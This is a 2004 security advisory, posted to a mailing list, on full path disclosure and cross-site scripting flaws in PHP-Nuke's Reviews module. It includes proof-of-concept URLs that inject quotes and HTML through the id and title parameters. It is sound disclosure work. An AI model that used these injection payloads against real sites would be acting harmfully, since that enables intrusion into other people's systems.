Multiple vulnerabilities PHP-Nuke

"Dark Bicho" <k1ll3rb0y@xxxxxxxxxxx> · Mon, 07 Jun 2004 16:30:38 -0500

original advisory : http://bichosoft.webcindario.com/advisory-05.txt

-------------------------------------------------------------------------------------------------

                           :.: Multiple vulnerabilities PHP-Nuke :.:

 PROGRAM: PHP-Nuke
 HOMEPAGE: http://phpnuke.org/
 VERSION: 6.x, 7.2, 7.3
 BUG: Multiple vulnerabilities
 DATE:  14/05/2004
 AUTHOR: DarkBicho
         web: http://www.darkbicho.tk
         team: Security Wari Proyects <www.swp-zone.org>
         Email: darkbicho@xxxxxxxx

-------------------------------------------------------------------------------------------------

1.- Affected software description:
   -----------------------------

   Php-Nuke is a popular content management system, written in php by
   Francisco Burzi.

2.- Vulnerabilities:
   ---------------

A. Full path disclosure:

   This vulnerability would allow a remote user to determine the full

   path to the web root directory and other potentially sensitive 
information.

   :.: Examples:

http://localhost/nuke1/modules.php?name=Reviews&rop=showcontent&id='DarkBicho

   Warning: date(): Windows does not support dates prior to midnight 
(00:00:00),

   January 1, 1970 in c:\appserv\www\nuke1\modules\Reviews\index.php on 
line 527

B. Cross-Site Scripting aka XSS:

   :.: id :

   * 
http://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='&title=a

   <input type=hidden name=id value='>

   :.: title :

   * 
http://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='&title=a

   :.: Examples:

http://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='<h1>DarkBicho</h1&title=a

http://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='&title=<h1>DarkBicho</h1>

3.- SOLUTION:

    ¨¨¨¨¨¨¨¨

   Vendors were contacted many weeks ago and plan to release a fixed 
version soon.

   Check the PHP-NUKE website for updates and official release details.

4.- Greetings:
   ---------

   greetings to my Peruvian group swp and perunderforce :D
   "EL PISCO ES Y SERA PERUANO"

5.- Contact
   -------

	WEB: http://www.darkbicho.tk
	EMAIL: darkbicho@xxxxxxxx

-------------------------------------------------------------------------------------------------
                               ___________      ____________
                              /   _____/  \    /  \______   \
                              \_____  \\   \/\/   /|     ___/
                             /        \\        / |    |
                            /_______  / \__/\  /  |____|
                            \/       \/

                               Security Wari Projects
                                 (c) 2002 - 2004
		                    Made in Peru

----------------------------------------[   EOF    
]----------------------------------------------

_________________________________________________________________

Consigue aquí las mejores y mas recientes ofertas de trabajo en América 
Latina y USA: http://latam.msn.com/empleos/